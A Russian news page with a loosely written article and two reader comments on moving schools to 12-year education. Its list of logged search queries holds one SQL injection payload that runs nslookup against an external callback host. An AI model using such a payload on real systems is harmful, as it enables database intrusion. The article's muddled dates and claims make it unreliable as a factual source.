Последние новости
Новости образования /

«Школьное обучение нужно сделать 12-летним»

В силу вступит закон о двенадцатилетнем образовании для детей специальных школ над которыми проводятся эксперименты, которые вносят специалисты по развитию детей, такой закон будет действителен с 2012/14 года, скорее всего дети такому ново веденному закону будут совсем не рады! Позже начиная уже с 2020 года закон вступит в силу что бы абсолютно все средние школы обучали детей на протяжение двенадцати лет. Такой приказ вызвал недоумение родителей школьников, по поводу этого проводились разговоры различного характера, говорилось о том зачем мучить детей такого рода экспериментами а далее введением в силу такого приказа, дети и так детства не видят. Но специалисты все равно стоят на своем хоть и понимают что с такой программой по которой выпускники сдают экзамены ЕГЭ сдать экзамен не возможно, поэтому хотят немного изменить программу, а о детях которые были бы готовы выдержать двенадцатилетнюю программу и говорить то нечего доводы показали что такого ученика который смог бы выдержать все это, еще и в помине нету!

У нас находят:
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-2372.1964.5a9f8.1.bxss.me
  • testing
  • когда вступает закон о 12 летнем обучении в школах
  • когда двенадцатилетнее образование вступит в силу в россии
  • эссе о 12 летнем образвании в рк
2 комментария
луиза / 15 июля 2012 / 15:16
Если школьное обучение сделать 12-летним, то наши взрослые дети уже в школе начнут замуж выходить и жениться, а мальчики со школьной скамьи будут в армию уходить. И кому это надо. Или детей еще раньше придется в школу отдавать. Тогда зачем детсады усиленно строят. До пяти лет дома с бабушкой, а потом сразу в школу. Бред какой-то.
kanitel / 25 июля 2012 / 15:51
А я считаю, что не так уж и плохо 12-летнее образование. Сейчас настолько интенсивная школьная программа, что у детей часто сильное переутомление. Все-таки по 6-7 уроков в день - это слишком много, я уже не говорю о домашнем задании. А в старших классах появляются еще и дополнительные занятия на курсах. Главное, чтобы основой 12-летнего образования стало снижение учебной нагрузки на школьников.
имя


Популярые сообщения